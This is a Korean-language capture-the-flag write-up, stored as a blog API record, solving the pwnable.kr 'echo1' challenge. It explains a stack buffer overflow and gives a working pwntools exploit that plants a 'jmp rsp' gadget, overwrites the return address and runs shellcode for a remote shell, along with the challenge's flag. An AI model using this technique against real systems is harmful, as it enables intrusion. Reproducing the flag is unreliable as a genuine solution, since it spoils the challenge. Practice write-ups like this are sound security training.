{"id":2542,"date":"2024-05-23T04:45:43","date_gmt":"2024-05-22T19:45:43","guid":{"rendered":"https:\/\/h4ck.kr\/?p=2542"},"modified":"2024-05-23T04:47:55","modified_gmt":"2024-05-22T19:47:55","slug":"echo1","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=2542","title":{"rendered":"echo1"},"content":{"rendered":"\n

Description<\/h2>\n\n\n\n

Pwn this echo service.<\/p>\n\n\n\n

download : http:\/\/pwnable.kr\/bin\/echo1<\/p>\n\n\n\n

Running at : nc pwnable.kr 9010<\/p>\n\n\n\n

checksec<\/h2>\n\n\n\n
\n
\n
ubuntu@wh1te4ever-main:~\/Desktop\/dreamhack-CTF\/pwnable.kr-echo1$ checksec .\/echo1\n[*] '\/home\/ubuntu\/Desktop\/dreamhack-CTF\/pwnable.kr-echo1\/echo1'\n    Arch:     amd64-64-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX disabled\n    PIE:      No PIE (0x400000)\n    RWX:      Has RWX segments<\/pre>\n<\/div>\n<\/div>\n\n\n\n
ASLR \b\ubc0f \uce74\ub098\ub9ac \ubcf4\ud638\uae30\ubc95 X + \uc258\ucf54\ub4dc \uc2e4\ud589 \uac00\ub2a5<\/p>\n\n\n\n
Decompiled-src \/ Analysis<\/h2>\n\n\n\n
main<\/strong><\/p>\n\n\n\n
\n
int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  _QWORD *v3; \/\/ rax\n  unsigned int i; \/\/ [rsp+Ch] [rbp-24h] BYREF\n  _QWORD v6[4]; \/\/ [rsp+10h] [rbp-20h] BYREF\n\n  setvbuf(stdout, 0LL, 2, 0LL);\n  setvbuf(stdin, 0LL, 1, 0LL);\n  o = malloc(0x28uLL);\n  *((_QWORD *)o + 3) = greetings;\n  *((_QWORD *)o + 4) = byebye;\n  printf(\"hey, what's your name? : \");\n  __isoc99_scanf(\"%24s\", v6);\n  v3 = o;\n  *(_QWORD *)o = v6[0];\n  v3[1] = v6[1];\n  v3[2] = v6[2];\n  id = v6[0];\n  getchar();\n  func[0] = (__int64)echo1;\n  qword_602088 = (__int64)echo2;\n  qword_602090 = (__int64)echo3;\n  for ( i = 0; i != 121; i = getchar() )\n  {\n    while ( 1 )\n    {\n      while ( 1 )\n      {\n        puts(\"\\n- select echo type -\");\n        puts(\"- 1. : BOF echo\");\n        puts(\"- 2. : FSB echo\");\n        puts(\"- 3. : UAF echo\");\n        puts(\"- 4. : exit\");\n        printf(\"> \");\n        __isoc99_scanf(\"%d\", &i);\n        getchar();\n        if ( i > 3 )\n          break;\n        ((void (*)(void))func[i - 1])();\n      }\n      if ( i == 4 )\n        break;\n      puts(\"invalid menu\");\n    }\n    cleanup();\n    printf(\"Are you sure you want to exit? (y\/n)\");\n  }\n  puts(\"bye\");\n  return 0;\n}<\/pre>\n<\/div><\/div>\n\n\n\n
\ucc98\uc74c\uc5d0 scanf \ud568\uc218\ub97c \ud1b5\ud574 id\ub77c\ub294 \uc804\uc5ed\ubcc0\uc218\uc5d0 4\ubc14\uc774\ud2b8\uc758 \uc6d0\ud558\ub294 \uac12\uc744 \uc785\ub825\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
\uadf8\ub9ac\uace0 echo type\uc744 \ud1b5\ud574 1-4\ubc88 \uba54\ub274\ub97c \uace0\ub97c \uc218 \uc788\ub294\ub370, 
2, 3\ubc88 \uba54\ub274\ub294 “not supported”\ub77c\uace0 \ub728\ub294 \ubc18\uba74, 
1\ubc88 \ub9e4\ub274\uc5d0\uc11c\ub294…<\/p>\n\n\n\n
echo1<\/strong><\/p>\n\n\n\n
\n
__int64 echo1()\n{\n  char s[32]; \/\/ [rsp+0h] [rbp-20h] BYREF\n\n  (*((void (__fastcall **)(void *))o + 3))(o);\n  get_input(s, 128LL);\n  puts(s);\n  (*((void (__fastcall **)(void *))o + 4))(o);\n  return 0LL;\n}<\/pre>\n<\/div><\/div>\n\n\n\n
\uc704\uc640 \uac19\uc774 1\ubc88 \uba54\ub274\uc5d0\uc11c\ub294 
\ud560\ub2f9\ub41c 32\ubc14\uc774\ud2b8\uc758 s \ubcc0\uc218\uc5d0 128\ubc14\uc774\ud2b8\uc758 \uac12\uc744 \uc785\ub825\ubc1b\uc744 \uc218 \uc788\uc5b4 BOF \ucde8\uc57d\uc810\uc744 \ubc1c\uc0dd\uc2dc\ud0ac \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
Solution<\/h2>\n\n\n
\n
\"\"<\/figure>\n<\/div>\n\n\n
main \ud568\uc218\uc5d0\uc11c id \ubcc0\uc218\uc5d0\ub294 jmp rsp; opcode\ub97c \uc9d1\uc5b4\ub123\uace0, 
echo1 \ud568\uc218\uc5d0\uc11c BOF \ucde8\uc57d\uc810\uc744 \ubc1c\uc0dd\uc2dc\ud0ac\ub54c, 
echo1’s RET\uc5d0\ub294 id \uc8fc\uc18c\uac12\uc73c\ub85c \ub36e\uace0, \uadf8 \ub4a4\uc5d0\ub294 \uc258\ucf54\ub4dc\ub85c \ud398\uc774\ub85c\ub4dc\ub97c \uad6c\uc131\ud558\uba74 \ub41c\ub2e4.<\/p>\n\n\n\n
\uadf8\ub7ec\uba74 echo1 \ud568\uc218\uc758 \uc5d0\ud544\ub85c\uadf8 \ub05d\uc5d0\ub294 rsp\uac00 \uc258\ucf54\ub4dc\ub97c \uac00\ub9ac\ud0a4\uac8c \ub418\ub294\ub370,
echo1’s RET\uc5d0 \ub36e\uc5b4\uc4f0\uc5ec\uc9c4 id \uc8fc\uc18c\uac12\uc758 jmp rsp; \uba85\ub839\uc5b4\uc5d0 \uc758\ud574 \uc258\ucf54\ub4dc\ub85c \uc810\ud504\ud558\uac8c \ub41c\ub2e4!<\/p>\n\n\n\n
\n
from pwn import *\n#context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\np = remote(\"pwnable.kr\", 9010)\n#p = process(\".\/echo1\")\ne = ELF('.\/echo1', checksec=False)\n\nshellcode = asm(shellcraft.sh())\np.sendlineafter(b\"hey, what's your name? : \", asm(\"nop; nop; jmp rsp\"))\n\np.sendlineafter(b\"> \", b\"1\")\n\np.sendline(b'A'*40 + p64(e.sym['id']) + shellcode)\n\np.interactive()<\/pre>\n<\/div><\/div>\n\n\n\n
Result<\/h2>\n\n\n\n
\n
ubuntu@wh1te4ever-main:~\/Desktop\/dreamhack-CTF\/pwnable.kr-echo1$ python3 solve.py\n[+] Opening connection to pwnable.kr on port 9010: Done\n[*] Switching to interactive mode\nhello \\x90\\x90\\xff\\xe4\n$                  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\xa0 `\ngoodbye \\x90\\x90\\xff\\xe4\n$                      ls\necho1\nflag\nlog\nsuper.pl\n$ cat flag\nH4d_som3_fun_w1th_ech0_ov3rfl0w\n$ \n[*] Interrupted\n[*] Closed connection to pwnable.kr port 9010<\/pre>\n<\/div><\/div>\n","protected":false},"excerpt":{"rendered":"
Description Pwn this echo service. download : http:\/\/pwnable.kr\/bin\/echo1 Running at : nc pwnable.kr 9010 checksec ASLR \b\ubc0f \uce74\ub098\ub9ac \ubcf4\ud638\uae30\ubc95 X + \uc258\ucf54\ub4dc \uc2e4\ud589 \uac00\ub2a5 Decompiled-src \/ Analysis main \ucc98\uc74c\uc5d0 scanf \ud568\uc218\ub97c \ud1b5\ud574 id\ub77c\ub294 \uc804\uc5ed\ubcc0\uc218\uc5d0 4\ubc14\uc774\ud2b8\uc758 \uc6d0\ud558\ub294 \uac12\uc744 \uc785\ub825\ud560 \uc218 \uc788\ub2e4. \uadf8\ub9ac\uace0 echo type\uc744 \ud1b5\ud574 1-4\ubc88 \uba54\ub274\ub97c \uace0\ub97c \uc218 \uc788\ub294\ub370, 2, 3\ubc88 \uba54\ub274\ub294 “not supported”\ub77c\uace0 \ub728\ub294… \ub354 \ubcf4\uae30 »echo1<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[4],"tags":[25],"class_list":["post-2542","post","type-post","status-publish","format-standard","hentry","category-pwnable-kr","tag-pwnable"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/2542","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2542"}],"version-history":[{"count":5,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/2542\/revisions"}],"predecessor-version":[{"id":2550,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/2542\/revisions\/2550"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2542"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2542"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2542"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}